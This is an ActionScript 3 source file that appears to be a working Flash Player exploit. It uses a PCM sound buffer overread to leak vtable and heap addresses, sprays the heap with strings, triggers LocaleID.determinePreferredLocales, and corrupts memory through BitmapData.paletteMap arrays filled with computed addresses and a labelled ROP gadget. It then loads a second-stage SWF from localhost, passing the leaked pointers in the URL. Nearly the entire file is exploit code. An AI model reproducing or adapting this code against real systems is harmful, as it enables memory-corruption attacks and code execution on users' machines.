package
	
{
	//import authoring;
	import flash.display.BitmapData;
	import flash.display.Sprite;
	import flash.events.Event;
	import flash.geom.Point;
	import flash.geom.Rectangle;
	import flash.globalization.LocaleID;
	import flash.media.Sound;
	import flash.net.URLRequest;
	import flash.text.TextField;
	import flash.utils.ByteArray;
	import flash.display.Loader;
	import flash.system.Security;
	import flash.external.ExternalInterface;
	
	public class soundPCM extends Sprite
	{
		//public var s2;
		public function soundPCM()
		{
			
			Security.allowDomain("*");
			var s = new Sound();
			var b = new ByteArray();
			for( var i = 0; i < 504*4; i++){
				b.writeByte(1);
			}
			b.position = 0;
			s.loadPCMFromByteArray(b, 504, "float", false, 44100.0);
			var c = new ByteArray();
			for(var i = 0; i < 1010; i++){
				c.writeByte(1); 
			}
			c.position = 0;
			try{
				s.loadPCMFromByteArray(c, 504, "float", false, 44000.0);
			}catch(e:Error){                
				trace(e.message);
			}
			
			var d = new ByteArray();
			s.extract(d, 32, 0);
			d.position = 0;
			var t:TextField = new TextField();
			var lb = 0;
			var vtable = [];
			try{
				while(true){
					
					var n = d.readFloat() * 32768.0;
					if (n < 0)
						n = n + 0x10000;
					t.text = t.text + n.toString(16);
					t.text = t.text + " ";
					if(lb % 4 == 3){
						t.text = t.text + "\r\n";
					}
					
					lb++;
					if(lb == 17){
					    vtable[0] = n;
					
					}
					if(lb == 18){
						vtable[1] = n;
						
					}
					if(lb == 19){
						vtable[2] = n;
						
					}
					
					if(lb == 20){
						break;
					
					}
					
					
				}
			}catch(e){
			
			}
			
			
			t.width = t.height = 3000;
		
			t.text = "vtable" + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
			addChild(t);
			var vstr = "";//"i am a temp string, oh yes i am, oh yes i am 324833241832418074384328097234803248907248902434034870330872079483";//"123412341234" + String.fromCharCode(vtable[0], vtable[1], vtable[2], 0);
			for(var si = 0; si < 4095; si++){
			
				vstr = vstr + "A";
			
			}
			var v:Vector.<String> = new Vector.<String>();
			for(var q = 0; q < 100; q++){
				v.push(vstr);
			
			
			}
			
		
			
			var s2 = new Sound();
			var b2 = new ByteArray();
			for( var i = 0; i < 202*4; i++){
				b2.writeByte(1);
			}
			b2.position = 0;
			s2.loadPCMFromByteArray(b2, 202, "float", false, 44100.0);
			var c2 = new ByteArray();
			for(var i = 0; i < 302*2+2; i++){
				c2.writeByte(1); 
			}
			c2.position = 0;
		
			
			
			try{
				s2.loadPCMFromByteArray(c2, 302, "float", false, 44100.0);
			}catch(e:Error){                
				trace(e.message);
			}
			
			LocaleID.determinePreferredLocales(v, v);
			
			
			var d2 = new ByteArray();
			s2.extract(d2, 202, 0);
			d2.position = 0;
			var buf = [0, 0, 0, 0]
			try{
				while(true){
					
					var n = d2.readFloat() * 32768.0;
					if (n < 0)
						n = n + 0x10000;
					t.text = t.text + n.toString(16);
					t.text = t.text + " ";
					if(lb % 16 == 15){
						t.text = t.text + "\n";
					}
					
					lb++;
						
					buf[0] = buf[1];
					buf[1] = buf[2];
					buf[2] = buf[3];
					buf[3] = n;
					
				}
			}catch(e){
				
			}
			
			
		var bmp:BitmapData = new BitmapData(10, 10, true, 10);
		var rect:Rectangle = new Rectangle(0, 0, 10, 10);
		var dp:Point = new Point(5, 5);
		var ra = [];
		var ba = [];
		var ga = [];
		var aa = [];
		for(var ai = 0; ai < 256; ai++){
			ra[ai] = 0x77770000 + ai;
			ba[ai] = 0x99990000 + ai;
			ga[ai] = 0x88880000 + ai;	
			aa[ai] = 0x66660000 + ai;
		
		}
		
		ra[3] = buf[2]; //gccontext
		ra[2] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext
		ba[0xcd] = buf[2]; //gccontext
		ba[0xcc] = (buf[1] * 0x10000) + buf[0] + 512*4; //gccontext
		aa[0x87] = buf[2]; //gccontext
		aa[0x86] = (buf[1] * 0x10000) + buf[0] + 256*4; //gccontext	
		ra[0x15] = buf[2]; //gccontext
		ra[0x14] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x20; //gccontext
		ga[0x5b] = buf[2]; //gccontext
		ga[0x5a] = (buf[1] * 0x10000) + buf[0] + 256*4 + 0x200; //gccontext
		ra[1] = buf[2]; //gccontext
		ra[0] = (buf[1] * 0x10000) + buf[0] + 0x40*4; //gccontext
		ra[0x49] = vtable[2];
		ra[0x48] = (vtable[1] * 0x10000) + vtable[0]  - 5766910; //- 5269070; //rdi to rax gadget 
		ra[0x40] = 0x78656867;
		ra[0x41] = 0;
		ra[0x51] = vtable[2];
		ra[0x50] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964; 
		
		ra[0x4b] = vtable[2];
		ra[0x4a] = (vtable[1] * 0x10000) + vtable[0] - 11965100; //- 11031964; 
			
		
		aa[255] = new killer(); // prevent array free
		for (var times = 0; times < 5000; times++){
		try{
			bmp.paletteMap(bmp,rect, dp, ra, ga, ba, aa);
		}catch(e:Error){
		
			trace(e.message);
		
		}

		}
		function startListener (e:Event):void{
			t.text = "Loading Completed";
			var ldr2:Loader = new Loader();
			var url2:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + buf[0] + "&num=14";
			var urlReq2:URLRequest = new URLRequest(url2);
			//ldr.contentLoaderInfo.addEventListener(Event.COMPLETE, startListener);
			ldr2.load(urlReq2);
			addChild(ldr2);
		}
		
	
		var bstr = buf[2].toString(16) + " " + buf[1].toString(16) + " " +buf[0].toString(16);
		t.text = bstr + "\r\n vtable " + vtable[2].toString(16)+ " " +vtable[1].toString(16) + " " + vtable[0].toString(16);
		var url:String = "http://127.0.0.1/ucrasher49.swf?a=" + buf[2] + "&b=" + buf[1] + "&c=" + (buf[0] + 6) + "&num=";
		ExternalInterface.call("sendToJavaScript", url);
		
		
		
		}
	}
}